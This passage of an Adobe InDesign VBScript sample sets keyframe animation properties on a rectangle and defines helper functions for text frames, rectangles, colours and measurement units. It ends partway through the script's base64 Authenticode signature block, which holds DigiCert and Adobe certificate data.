Array(23, 180), Array(47, 0), Array(71, -180), Array(95, 0), Array(119, 180), Array(143, -360)) myRectangle1P6.AnimationSettings.ScaleXArray = Array( Array(0, 100.0 ), Array(23, 200.0), Array(47, 100.0), Array(71, 300.0), Array(95, 100.0), Array(119, 200.0), Array(143, 100.0) ) myRectangle1P6.AnimationSettings.ScaleYArray = Array( Array(0, 100.0 ), Array(23, 0.0), Array(47, 100.0), Array(71, 0.0), Array(95, 100.0), Array(119, 300.0), Array(143, 100.0) ) myRectangle1P6.AnimationSettings.OpacityArray = Array( Array(0, 100.0 ), Array(23, 0.0), Array(47, 100.0), Array(71, 0.0), Array(95, 100.0), Array(119, 0.0), Array(143, 100.0) ) myRectangle1P6.AnimationSettings.Plays = 1 myRectangle1P6.AnimationSettings.PlaysLoop = False myRectangle1P6.AnimationSettings.EaseType = idAnimationEaseOptions.idNoEase myRectangle1P6.AnimationSettings.TransformOffsets = Array(0.5, 0.5) myRectangle1P6.AnimationSettings.DesignOption = idDesignOptions.idFromCurrentAppearance myRectangle1P6.AnimationSettings.InitiallyHidden = False myRectangle1P6.AnimationSettings.HiddenAfter = False End Function Rem Utility functions. Function mySetUnits(myInDesign, myUnits) myInDesign.Documents.Item(1).ViewPreferences.HorizontalMeasurementUnits = myUnits myInDesign.Documents.Item(1).ViewPreferences.VerticalMeasurementUnits = myUnits End Function Function myMakeTextFrame(myInDesign, myPage, myBounds, myString, myFontName, myPointSize, myJustification, myFitToContent) Set myTextFrame = myPage.TextFrames.Add myTextFrame.GeometricBounds = myBounds myTextFrame.Texts.Item(1).InsertionPoints.Item(1).Contents = myString myTextFrame.Texts.Item(1).ParentStory.AppliedFont = myInDesign.Fonts.Item(myFontName) myTextFrame.Texts.Item(1).ParentStory.PointSize = myPointSize myTextFrame.Texts.Item(1).ParentStory.FillColor = myInDesign.Documents.Item(1).Swatches.Item("Black") myTextFrame.Texts.Item(1).Justification = myJustification If myFitToContent = True Then myTextFrame.Fit idFitOptions.idFrameToContent End If Set myMakeTextFrame = myTextFrame End Function Function myMakeRectangle(myPage, myBounds, myString, myFillColor, myStrokeColor, myStrokeWeight) Set myRectangle = myPage.rectangles.Add myRectangle.GeometricBounds = myBounds myRectangle.fillColor = myFillColor myRectangle.strokeWeight = myStrokeWeight myRectangle.strokeColor = myStrokeColor myRectangle.name = myString Set myMakeRectangle = myRectangle End Function Function myMakeColor(myInDesign, myColorName, myColorSpace, myColorModel, myColorValue) Set myDocument = myInDesign.Documents.Item(1) Rem Something like a try...catch for VBScript. On Error Resume Next Set myColor = myDocument.Colors.Item(myColorName) If Err.Number <> 0 Then Set myColor = myDocument.Colors.Add End If Err.Clear On Error GoTo 0 myColor.Name = myColorName myColor.Space = myColorSpace myColor.Model = myColorModel myColor.ColorValue = myColorValue Set myMakeColor = myColor End Function '' SIG '' Begin signature block '' SIG '' MIIpyAYJKoZIhvcNAQcCoIIpuTCCKbUCAQExDzANBglg '' SIG '' hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor '' SIG '' BgEEAYI3AgEeMCQCAQEEEE7wKRaZJ7VNj+Ws4Q8X66sC '' SIG '' AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg '' SIG '' xpuXGY7zcDXfc4mE883lw/WY5/zESsMnGCKupPEDgpSg '' SIG '' gg6WMIIGsDCCBJigAwIBAgIQCK1AsmDSnEyfXs2pvZOu '' SIG '' 2TANBgkqhkiG9w0BAQwFADBiMQswCQYDVQQGEwJVUzEV '' SIG '' MBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 '' SIG '' d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQDExhEaWdpQ2Vy '' SIG '' dCBUcnVzdGVkIFJvb3QgRzQwHhcNMjEwNDI5MDAwMDAw '' SIG '' WhcNMzYwNDI4MjM1OTU5WjBpMQswCQYDVQQGEwJVUzEX '' SIG '' MBUGA1UEChMORGlnaUNlcnQsIEluYy4xQTA/BgNVBAMT '' SIG '' OERpZ2lDZXJ0IFRydXN0ZWQgRzQgQ29kZSBTaWduaW5n '' SIG '' IFJTQTQwOTYgU0hBMzg0IDIwMjEgQ0ExMIICIjANBgkq '' SIG '' hkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA1bQvQtAorXi3 '' SIG '' XdU5WRuxiEL1M4zrPYGXcMW7xIUmMJ+kjmjYXPXrNCQH '' SIG '' 4UtP03hD9BfXHtr50tVnGlJPDqFX/IiZwZHMgQM+TXAk '' SIG '' ZLON4gh9NH1MgFcSa0OamfLFOx/y78tHWhOmTLMBICXz '' SIG '' ENOLsvsI8IrgnQnAZaf6mIBJNYc9URnokCF4RS6hnyzh '' SIG '' GMIazMXuk0lwQjKP+8bqHPNlaJGiTUyCEUhSaN4QvRRX '' SIG '' XegYE2XFf7JPhSxIpFaENdb5LpyqABXRN/4aBpTCfMjq '' SIG '' GzLmysL0p6MDDnSlrzm2q2AS4+jWufcx4dyt5Big2MEj '' SIG '' R0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJa '' SIG '' wv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tv '' SIG '' k2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBe '' SIG '' M/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7b '' SIG '' UKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2 '' SIG '' FKZbS110YU0/EpF23r9Yy3IQKUHw1cVtJnZoEUETWJrc '' SIG '' JisB9IlNWdt4z4FKPkBHX8mBUHOFECMhWWCKZFTBzCEa '' SIG '' 6DgZfGYczXg4RTCZT/9jT0y7qg0IU0F8WD1Hs/q27Iwy '' SIG '' CQLMbDwMVhECAwEAAaOCAVkwggFVMBIGA1UdEwEB/wQI '' SIG '' MAYBAf8CAQAwHQYDVR0OBBYEFGg34Ou2O/hfEYb7/mF7 '' SIG '' CIhl9E5CMB8GA1UdIwQYMBaAFOzX44LScV1kTN8uZz/n '' SIG '' upiuHA9PMA4GA1UdDwEB/wQEAwIBhjATBgNVHSUEDDAK '' SIG '' BggrBgEFBQcDAzB3BggrBgEFBQcBAQRrMGkwJAYIKwYB '' SIG '' BQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBB '' SIG '' BggrBgEFBQcwAoY1aHR0cDovL2NhY2VydHMuZGlnaWNl '' SIG '' cnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZFJvb3RHNC5jcnQw '' SIG '' QwYDVR0fBDwwOjA4oDagNIYyaHR0cDovL2NybDMuZGln '' SIG '' aWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZFJvb3RHNC5j '' SIG '' cmwwHAYDVR0gBBUwEzAHBgVngQwBAzAIBgZngQwBBAEw '' SIG '' DQYJKoZIhvcNAQEMBQADggIBADojRD2NCHbuj7w6mdNW '' SIG '' 4AIapfhINPMstuZ0ZveUcrEAyq9sMCcTEp6QRJ9L/Z6j '' SIG '' fCbVN7w6XUhtldU/SfQnuxaBRVD9nL22heB2fjdxyyL3 '' SIG '' WqqQz/WTauPrINHVUHmImoqKwba9oUgYftzYgBoRGRjN '' SIG '' YZmBVvbJ43bnxOQbX0P4PpT/djk9ntSZz0rdKOtfJqGV '' SIG '' WEjVGv7XJz/9kNF2ht0csGBc8w2o7uCJob054ThO2m67 '' SIG '' Np375SFTWsPK6Wrxoj7bQ7gzyE84FJKZ9d3OVG3ZXQIU '' SIG '' H0AzfAPilbLCIXVzUstG2MQ0HKKlS43Nb3Y3LIU/Gs4m '' SIG '' 6Ri+kAewQ3+ViCCCcPDMyu/9KTVcH4k4Vfc3iosJocsL '' SIG '' 6TEa/y4ZXDlx4b6cpwoG1iZnt5LmTl/eeqxJzy6kdJKt '' SIG '' 2zyknIYf48FWGysj/4+16oh7cGvmoLr9Oj9FpsToFpFS '' SIG '' i0HASIRLlk2rREDjjfAVKM7t8RhWByovEMQMCGQ8M4+u '' SIG '' KIw8y4+ICw2/O/TOHnuO77Xry7fwdxPm5yg/rBKupS8i '' SIG '' bEH5glwVZsxsDsrFhsP2JjMMB0ug0wcCampAMEhLNKhR '' SIG '' ILutG4UI4lkNbcoFUCvqShyepf2gpx8GdOfy1lKQ/a+F '' SIG '' SCH5Vzu0nAPthkX0tGFuv2jiJmCG6sivqf6UHedjGzqG '' SIG '' VnhOMIIH3jCCBcagAwIBAgIQD99ExMbwCe2qSx8hp1o/ '' SIG '' EDANBgkqhkiG9w0BAQsFADBpMQswCQYDVQQGEwJVUzEX '' SIG '' MBUGA1UEChMORGlnaUNlcnQsIEluYy4xQTA/BgNVBAMT '' SIG '' OERpZ2lDZXJ0IFRydXN0ZWQgRzQgQ29kZSBTaWduaW5n '' SIG '' IFJTQTQwOTYgU0hBMzg0IDIwMjEgQ0ExMB4XDTIzMTEw '' SIG '' MzAwMDAwMFoXDTI1MTEwNDIzNTk1OVowgeYxEzARBgsr '' SIG '' BgEEAYI3PAIBAxMCVVMxGTAXBgsrBgEEAYI3PAIBAhMI '' SIG '' RGVsYXdhcmUxHTAbBgNVBA8MFFByaXZhdGUgT3JnYW5p '' SIG '' emF0aW9uMRAwDgYDVQQFEwcyNzQ4MTI5MQswCQYDVQQG '' SIG '' EwJVUzELMAkGA1UECBMCY2ExETAPBgNVBAcTCFNhbiBK '' SIG '' b3NlMRMwEQYDVQQKEwpBZG9iZSBJbmMuMSwwKgYDVQQL '' SIG '' EyNJbGx1c3RyYXRvciwgSW5EZXNpZ24sIEluQ29weSwg '' SIG '' TXVzZTETMBEGA1UEAxMKQWRvYmUgSW5jLjCCAiIwDQYJ '' SIG '' KoZIhvcNAQEBBQADggIPADCCAgoCggIBAPCR5c/cgyg4 '' SIG '' MpJD46/+BWENPhE1RjN77VE2BWlIUdiO2nlWelKthEq9 '' SIG '' aK+1ofKIlDVc9mvxksuXBLESi7HBt3PCVBntNJkjBJd0 '' SIG '' EXeprmDK8HZrz8y/KSwEewbTMjneMRIRcJV2GMoAyUzK '' SIG '' EyFJF7m6ByeoNBDDXMD4AQF5C2l3wfvRbREw+G+cyeya '' SIG '' 564AHpFJ9sfqi9jAycnEZISxEf6N72GgGQr04cZt3JTb '' SIG '' TktZGt6uWdZnseXDLGRHzFu4P4EqmVKvfMDliaKyWBzV '' SIG '' lY+gmtE1vSxIK79WTySFrFY5j1vtbKyHybk6tv4TOmLt '' SIG '' Lw4OP/ngVDiw/ZP+b7saGxPOEfuh5LOAr+llt+6V5NhT '' SIG '' dkYPR6cbokawwX2DbGg7IeVuUPdf9bx/LznFV/8kPxCB '' SIG '' J6qg0dqvCmQt/XbBXPJUvDoVJ9z+9hDlrAoLESqpHK8U '' SIG '' 73UFGohBMJ/7itIyKngem7Ms98z6x0i63FJA8C06g+XE '' SIG '' GJUmR28+c6ba+m/sc6xHI4zdL5a84UeRS9+u8UL8N4av '' SIG '' fpSxHYTTxVjk1ZlwQ8dLARwEVWvTu4lRcEck3RPogx7o '' SIG '' o8wUpSw9++m+Oi+K/z7RP/R67uCEtrkdM5N/xUoQR/t6 '' SIG '' 3P2ia9g8+LuYJ2BNBd1+qMcSoSlDfIFLFMeeqESbMv+j '' SIG '' UsRQJn2lZvufAgMBAAGjggICMIIB/jAfBgNVHSMEGDAW '' SIG '' gBRoN+Drtjv4XxGG+/5hewiIZfROQjAdBgNVHQ4EFgQU '' SIG '' RPnrJ9yT26rMrd/Q4PfQSlgeaRcwPQYDVR0gBDYwNDAy '' SIG '' BgVngQwBAzApMCcGCCsGAQUFBwIBFhtodHRwOi8vd3d3 '' SIG '' LmRpZ2ljZXJ0LmNvbS9DUFMwDgYDVR0PAQH/BAQDAgeA '' SIG '' MBMGA1UdJQQMMAoGCCsGAQUFBwMDMIG1BgNVHR8Ega0w '' SIG '' gaowU6BRoE+GTWh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNv '' SIG '' bS9EaWdpQ2VydFRydXN0ZWRHNENvZGVTaWduaW5nUlNB '' SIG '' NDA5NlNIQTM4NDIwMjFDQTEuY3JsMFOgUaBPhk1odHRw '' SIG '' Oi8vY3JsNC5kaWdpY2VydC5jb20vRGlnaUNlcnRUcnVz '' SIG '' dGVkRzRDb2RlU2lnbmluZ1JTQTQwOTZTSEEzODQyMDIx '' SIG '' Q0ExLmNybDCBlAYIKwYBBQUHAQEEgYcwgYQwJAYIKwYB '' SIG '' BQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBc '' SIG '' BggrBgEFBQcwAoZQaHR0cDovL2NhY2VydHMuZGlnaWNl '' SIG '' cnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0Q29kZVNpZ25p '' SIG '' bmdSU0E0MDk2U0hBMzg0MjAyMUNBMS5jcnQwCQYDVR0T '' SIG '' BAIwADANBgkqhkiG9w0BAQsFAAOCAgEAPIZ9C4IuKg85 '' SIG '' 0H8M66OLMVllIpANmEjijIG/D65qP6jfma+2WFps2bb+ '' SIG '' vKKIEtG9TFtCAlSrA1OV6Ru78paq0gqw/q3QAN0OleFR '' SIG '' F1NvT/TLO0ulhjXTETB1BwSKZaJH001DH0+60TmbGfVh '' SIG '' mwLrEj2Zfl4COFwivZ/2tRoknZl5tmiu4hpjDbOapWd9 '' SIG '' 5cqliSoMeu2i588557eikdiDk6bXBa5MxHjyXvbvaIWN '' SIG '' Zjsymn0L0sYkF3BToDN0h0XiTTZjZPHdSV2GjX6C/+Nj '' SIG '' HSZGRtBaIxdAL1mKEWJV9qkEKELPb098rO+zGdn1E5IH '' SIG '' pS1zSRIYngwZEjZfyoCkg1F+EW4QPs2+ff2CsW5i3IEd '' SIG '' 7vL19w9oyce3S4wejvnlTKt+EQWn3gSPxrbkp3BxdWRN '' SIG '' 25MKo5bS5bJ21BiwqcIJHcTxWNgaQPh4sZboi9IimCSn '' SIG '' UenPQhqdeOuz0NnmepMEYd7L/kqnAeUZ8bW1UbITAWQ/ '' SIG '' UT3phjCfRQNpEh4OBoUcH8hOOHZ0Lh86mxv9lDP3i7c/ '' SIG '' bQzZnrJr2dS34JXolwREbTX9Yu5JB5X3YP539/M1Ms5O '' SIG '' FZou/MHQBrWMsVBsEXDTWqwbMTYw/zvIiHXcGUnpzInw '' SIG '' 1jQXlLrmwVHW4ug+A4LFO7bWC4mnZoDNWp0xnlGmbP6I '' SIG '' ccJmW5C7RJMxghqKMIIahgIBATB9MGkxCzAJBgNVBAYT '' SIG '' AlVTMRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjFBMD8G '' SIG '' A1UEAxM4RGlnaUNlcnQgVHJ1c3RlZCBHNCBDb2RlIFNp '' SIG '' Z25pbmcgUlNBNDA5NiBTSEEzODQgMjAyMSBDQTECEA/f '' SIG '' RMTG8AntqksfIadaPxAwDQYJYIZIAWUDBAIBBQCggZww '' SIG '' GQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYB '' SIG '' BAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcN '' SIG '' AQkEMSIEIEkJSPMs87diTSwID3bOkllwUWrY2O7c035J '' SIG '' KYH/EyToMDAGCisGAQQBgjcCAQwxIjAgoB6AHABBAGQA '' SIG '' bwBiAGUAIABJAG4ARABlAHMAaQBnAG4wDQYJKoZIhvcN '' SIG '' AQEBBQAEggIAsh+cZLUPsd3lObZS+jucGL3hwAjiKVDF '' SIG '' xi509WXIxaGaBgyUslEv+oLAwAy4kObtZDq+0ZA9IWOe '' SIG '' 5la9MxcBI5xtIyYmNgJocMKJ7zk/t5jspILv/OBi/aPU '' SIG '' keWTwJl9Ymiraofjnnll+4FveQPp45QrVxexeAOckHcf '' SIG '' gsXNtd9EpU5VltnYKGi0krHawXQHEK5xP14Dj0AL+rJI '' SIG '' TahFIZhIOGI6wAWqNPVQfxEQoLjyhuQOATsiXDOnuKhM '' SIG '' EluvoTMcp71vxrRvjP8XupEvSWwoT2RdPYaWkNtaXt+f '' SIG '' tEXjOIF8axZ4Bp/nk5RZOpHAe42dFs4FYL5A1YqdwQM+ '' SIG '' vgNdT85QmzuxWJYRUfsQZ9dwpXKv+iZ0Q9gXBriI8Alz '' SIG '' bRWvgQXrhtYu3vS++ThVWO43rzZb2DUr3qVrvUNthBwm '' SIG '' vDxFsaTN793XwBzB/UWUu049oDSipbSKZ0fXGZWO8vH1 '' SIG '' jM+DU7EsPDXcPe0JY+1dXK7/yE387ZYiG19sLEt9VcXu '' SIG '' TRF9bx6178JmBc2OlUJO4i/TM+MO3SxpnQPBCXFCvQNw '' SIG '' MhjqS/jAXBXSR2ISD3RunusaGogWeNglxAmI8gYH4/vN '' SIG '' BBJTdVM6D+JzC4LC2HISpgrnCR2E5p0cCAPpCoNJn8FB '' SIG '' iesfs+IFId4u7ySv2gJqu7twJA7lRpndxKChghc/MIIX '' SIG '' OwYKKwYBBAGCNwMDATGCFyswghcnBgkqhkiG9w0BBwKg '' SIG '' ghcYMIIXFAIBAzEPMA0GCWCGSAFlAwQCAQUAMHcGCyqG '' SIG '' SIb3DQEJEAEEoGgEZjBkAgEBBglghkgBhv1sBwEwMTAN '' SIG '' BglghkgBZQMEAgEFAAQgXOWPPWYVwaMjtAZXPMP1fk11 '' SIG '' IgT41Irl7OG4lk3MVXsCEBZx5AAnN51sMqn3iCSzjOkY '' SIG '' DzIwMjQwNDE5MDEyNDI2WqCCEwkwggbCMIIEqqADAgEC '' SIG '' AhAFRK/zlJ0IOaa/2z9f5WEWMA0GCSqGSIb3DQEBCwUA '' SIG '' MGMxCzAJBgNVBAYTAlVTMRcwFQYDVQQKEw5EaWdpQ2Vy '' SIG '' dCwgSW5jLjE7MDkGA1UEAxMyRGlnaUNlcnQgVHJ1c3Rl '' SIG '' ZCBHNCBSU0E0MDk2IFNIQTI1NiBUaW1lU3RhbXBpbmcg '' SIG '' Q0EwHhcNMjMwNzE0MDAwMDAwWhcNMzQxMDEzMjM1OTU5 '' SIG '' WjBIMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNl '' SIG '' cnQsIEluYy4xIDAeBgNVBAMTF0RpZ2lDZXJ0IFRpbWVz '' SIG '' dGFtcCAyMDIzMIICIjANBgkqhkiG9w0BAQEFAAOCAg8A '' SIG '' MIICCgKCAgEAo1NFhx2DjlusPlSzI+DPn9fl0uddoQ4J '' SIG '' 3C9Io5d6OyqcZ9xiFVjBqZMRp82qsmrdECmKHmJjadNY '' SIG '' nDVxvzqX65RQjxwg6seaOy+WZuNp52n+W8PWKyAcwZeU '' SIG '' tKVQgfLPywemMGjKg0La/H8JJJSkghraarrYO8pd3hkY '' SIG '' hftF6g1hbJ3+cV7EBpo88MUueQ8bZlLjyNY+X9pD04T1 '' SIG '' 0Mf2SC1eRXWWdf7dEKEbg8G45lKVtUfXeCk5a+B4WZfj '' SIG '' RCtK1ZXO7wgX6oJkTf8j48qG7rSkIWRw69XloNpjsy7p '' SIG '' Be6q9iT1HbybHLK3X9/w7nZ9MZllR1WdSiQvrCuXvp/k '' SIG '' /XtzPjLuUjT71Lvr1KAsNJvj3m5kGQc3AZEPHLVRzapM '' SIG '' ZoOIaGK7vEEbeBlt5NkP4FhB+9ixLOFRr7StFQYU6mII '' SIG '' E9NpHnxkTZ0P387RXoyqq1AVybPKvNfEO2hEo6U7Qv1z '' SIG '' fe7dCv95NBB+plwKWEwAPoVpdceDZNZ1zY8SdlalJPrX '' SIG '' xGshuugfNJgvOuprAbD3+yqG7HtSOKmYCaFxsmxxrz64 '' SIG '' b5bV4RAT/mFHCoz+8LbH1cfebCTwv0KCyqBxPZySkwS0 '' SIG '' aXAnDU+3tTbRyV8IpHCj7ArxES5k4MsiK8rxKBMhSVF+ '' SIG '' BmbTO77665E42FEHypS34lCh8zrTioPLQHsCAwEAAaOC '' SIG '' AYswggGHMA4GA1UdDwEB/wQEAwIHgDAMBgNVHRMBAf8E '' SIG '' AjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUFBwMIMCAGA1Ud '' SIG '' IAQZMBcwCAYGZ4EMAQQCMAsGCWCGSAGG/WwHATAfBgNV '' SIG '' HSMEGDAWgBS6FtltTYUvcyl2mi91jGogj57IbzAdBgNV '' SIG '' HQ4EFgQUpbbvE+fvzdBkodVWqWUxo97V40kwWgYDVR0f '' SIG '' BFMwUTBPoE2gS4ZJaHR0cDovL2NybDMuZGlnaWNlcnQu '' SIG '' Y29tL0RpZ2lDZXJ0VHJ1c3RlZEc0UlNBNDA5NlNIQTI1 '' SIG '' NlRpbWVTdGFtcGluZ0NBLmNybDCBkAYIKwYBBQUHAQEE '' SIG '' gYMwgYAwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRp '' SIG '' Z2ljZXJ0LmNvbTBYBggrBgEFBQcwAoZMaHR0cDovL2Nh '' SIG '' Y2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3Rl '' SIG '' ZEc0UlNBNDA5NlNIQTI1NlRpbWVTdGFtcGluZ0NBLmNy '' SIG '' dDANBgkqhkiG9w0BAQsFAAOCAgEAgRrW3qCptZgXvHCN '' SIG '' T4o8aJzYJf/LLOTN6l0ikuyMIgKpuM+AqNnn48XtJoKK '' SIG '' cS8Y3U623mzX4WCcK+3tPUiOuGu6fF29wmE3aEl3o+uQ '' SIG '' qhLXJ4Xzjh6S2sJAOJ9dyKAuJXglnSoFeoQpmLZXeY/b '' SIG '' JlYrsPOnvTcM2Jh2T1a5UsK2nTipgedtQVyMadG5K8TG '' SIG '' e8+c+njikxp2oml101DkRBK+IA2eqUTQ+OVJdwhaIcW0 '' SIG '' z5iVGlS6ubzBaRm6zxbygzc0brBBJt3eWpdPM43UjXd9 '' SIG '' dUWhpVgmagNF3tlQtVCMr1a9TMXhRsUo063nQwBw3syY '' SIG '' nhmJA+rUkTfvTVLzyWAhxFZH7doRS4wyw4jmWOK22z75 '' SIG '' X7BC1o/jF5HRqsBV44a/rCcsQdCaM0qoNtS5cpZ+l3k4 '' SIG '' SF/Kwtw9Mt911jZnWon49qfH5U81PAC9vpwqbHkB3NpE '' SIG '' 5jreODsHXjlY9HxzMVWggBHLFAx+rrz+pOt5Zapo1iLK '' SIG '' O+uagjVXKBbLafIymrLS2Dq4sUaGa7oX/cR3bBVsrquv '' SIG '' czroSUa31X/MtjjA2Owc9bahuEMs305MfR5ocMB3CtQC '' SIG '' 4Fxguyj/OOVSWtasFyIjTvTs0xf7UGv/B3cfcZdEQcm4 '' SIG '' RtNsMnxYL2dHZeUbc7aZ+WssBkbvQR7w8F/g29mtkIBE '' SIG '' r4AQQYowggauMIIElqADAgECAhAHNje3JFR82Ees/Shm '' SIG '' Kl5bMA0GCSqGSIb3DQEBCwUAMGIxCzAJBgNVBAYTAlVT '' SIG '' MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsT '' SIG '' EHd3dy5kaWdpY2VydC5jb20xITAfBgNVBAMTGERpZ2lD '' SIG '' ZXJ0IFRydXN0ZWQgUm9vdCBHNDAeFw0yMjAzMjMwMDAw '' SIG '' MDBaFw0zNzAzMjIyMzU5NTlaMGMxCzAJBgNVBAYTAlVT '' SIG '' MRcwFQYDVQQKEw5EaWdpQ2VydCwgSW5jLjE7MDkGA1UE '' SIG '' AxMyRGlnaUNlcnQgVHJ1c3RlZCBHNCBSU0E0MDk2IFNI '' SIG '' QTI1NiBUaW1lU3RhbXBpbmcgQ0EwggIiMA0GCSqGSIb3 '' SIG '' DQEBAQUAA4ICDwAwggIKAoICAQDGhjUGSbPBPXJJUVXH '' SIG '' JQPE8pE3qZdRodbSg9GeTKJtoLDMg/la9hGhRBVCX6SI '' SIG '' 82j6ffOciQt/nR+eDzMfUBMLJnOWbfhXqAJ9/UO0hNoR '' SIG '' 8XOxs+4rgISKIhjf69o9xBd/qxkrPkLcZ47qUT3w1lbU '' SIG '' 5ygt69OxtXXnHwZljZQp09nsad/ZkIdGAHvbREGJ3Hxq '' SIG '' V3rwN3mfXazL6IRktFLydkf3YYMZ3V+0VAshaG43IbtA '' SIG '' rF+y3kp9zvU5EmfvDqVjbOSmxR3NNg1c1eYbqMFkdECn '' SIG '' wHLFuk4fsbVYTXn+149zk6wsOeKlSNbwsDETqVcplicu '' SIG '' 9Yemj052FVUmcJgmf6AaRyBD40NjgHt1biclkJg6OBGz '' SIG '' 9vae5jtb7IHeIhTZgirHkr+g3uM+onP65x9abJTyUpUR '' SIG '' K1h0QCirc0PO30qhHGs4xSnzyqqWc0Jon7ZGs506o9UD '' SIG '' 4L/wojzKQtwYSH8UNM/STKvvmz3+DrhkKvp1KCRB7UK/ '' SIG '' BZxmSVJQ9FHzNklNiyDSLFc1eSuo80VgvCONWPfcYd6T '' SIG '' /jnA+bIwpUzX6ZhKWD7TA4j+s4/TXkt2ElGTyYwMO1uK '' SIG '' IqjBJgj5FBASA31fI7tk42PgpuE+9sJ0sj8eCXbsq11G '' SIG '' deJgo1gJASgADoRU7s7pXcheMBK9Rp6103a50g5rmQzS '' SIG '' M7TNsQIDAQABo4IBXTCCAVkwEgYDVR0TAQH/BAgwBgEB '' SIG '' /wIBADAdBgNVHQ4EFgQUuhbZbU2FL3MpdpovdYxqII+e '' SIG '' yG8wHwYDVR0jBBgwFoAU7NfjgtJxXWRM3y5nP+e6mK4c '' SIG '' D08wDgYDVR0PAQH/BAQDAgGGMBMGA1UdJQQMMAoGCCsG '' SIG '' AQUFBwMIMHcGCCsGAQUFBwEBBGswaTAkBggrBgEFBQcw '' SIG '' AYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMEEGCCsG '' SIG '' AQUFBzAChjVodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5j '' SIG '' b20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNydDBDBgNV '' SIG '' HR8EPDA6MDigNqA0hjJodHRwOi8vY3JsMy5kaWdpY2Vy '' SIG '' dC5jb20vRGlnaUNlcnRUcnVzdGVkUm9vdEc0LmNybDAg '' SIG '' BgNVHSAEGTAXMAgGBmeBDAEEAjALBglghkgBhv1sBwEw '' SIG '' DQYJKoZIhvcNAQELBQADggIBAH1ZjsCTtm+YqUQiAX5m '' SIG '' 1tghQuGwGC4QTRPPMFPOvxj7x1Bd4ksp+3CKDaopafxp '' SIG '' wc8dB+k+YMjYC+VcW9dth/qEICU0MWfNthKWb8RQTGId '' SIG '' DAiCqBa9qVbPFXONASIlzpVpP0d3+3J0FNf/q0+KLHqr '' SIG '' hc1DX+1gtqpPkWaeLJ7giqzl/Yy8ZCaHbJK9nXzQcAp8 '' SIG '' 76i8dU+6WvepELJd6f8oVInw1YpxdmXazPByoyP6wCeC '' SIG '' RK6ZJxurJB4mwbfeKuv2nrF5mYGjVoarCkXJ38SNoOeY '' SIG '' +/umnXKvxMfBwWpx2cYTgAnEtp/Nh4cku0+jSbl3ZpHx '' SIG '' cpzpSwJSpzd+k1OsOx0ISQ+UzTl63f8lY5knLD0/a6fx '' SIG '' ZsNBzU+2QJshIUDQtxMkzdwdeDrknq3lNHGS1yZr5Dhz '' SIG '' q6YBT70/O3itTK37xJV77QpfMzmHQXh6OOmc4d0j/R0o '' SIG '' 08f56PGYX/sr2H7yRp11LB4nLCbbbxV7HhmLNriT1Oby '' SIG '' F5lZynDwN7+YAN8gFk8n+2BnFqFmut1VwDophrCYoCvt '' SIG '' lUG3OtUVmDG0YgkPCr2B2RP+v6TR81fZvAT6gt4y3wSJ '' SIG '' 8ADNXcL50CN/AAvkdgIm2fBldkKmKYcJRyvmfxqkhQ/8 '' SIG '' mJb2VVQrH4D6wPIOK+XW+6kvRBVK5xMOHds3OBqhK/bt '' SIG '' 1nz8MIIFjTCCBHWgAwIBAgIQDpsYjvnQLefv21DiCEAY '' SIG '' WjANBgkqhkiG9w0BAQwFADBlMQswCQYDVQQGEwJVUzEV '' SIG '' MBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 '' SIG '' d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2Vy '' SIG '' dCBBc3N1cmVkIElEIFJvb3QgQ0EwHhcNMjIwODAxMDAw '' SIG '' MDAwWhcNMzExMTA5MjM1OTU5WjBiMQswCQYDVQQGEwJV '' SIG '' UzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQL '' SIG '' ExB3d3cuZGlnaWNlcnQuY29tMSEwHwYDVQQDExhEaWdp '' SIG '' Q2VydCBUcnVzdGVkIFJvb3QgRzQwggIiMA0GCSqGSIb3 '' SIG '' DQEBAQUAA4ICDwAwggIKAoICAQC/5pBzaN675F1KPDAi '' SIG '' MGkz7MKnJS7JIT3yithZwuEppz1Yq3aaza57G4QNxDAf '' SIG '' 8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxSD1Ifxp4VpX6+ '' SIG '' n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQLt+C8weE5nQ7 '' SIG '' bXHiLQwb7iDVySAdYyktzuxeTsiT+CFhmzTrBcZe7Fsa '' SIG '' vOvJz82sNEBfsXpm7nfISKhmV1efVFiODCu3T6cw2Vbu '' SIG '' yntd463JT17lNecxy9qTXtyOj4DatpGYQJB5w3jHtrHE '' SIG '' tWoYOAMQjdjUN6QuBX2I9YI+EJFwq1WCQTLX2wRzKm6R '' SIG '' AXwhTNS8rhsDdV14Ztk6MUSaM0C/CNdaSaTC5qmgZ92k '' SIG '' J7yhTzm1EVgX9yRcRo9k98FpiHaYdj1ZXUJ2h4mXaXpI '' SIG '' 8OCiEhtmmnTK3kse5w5jrubU75KSOp493ADkRSWJtppE 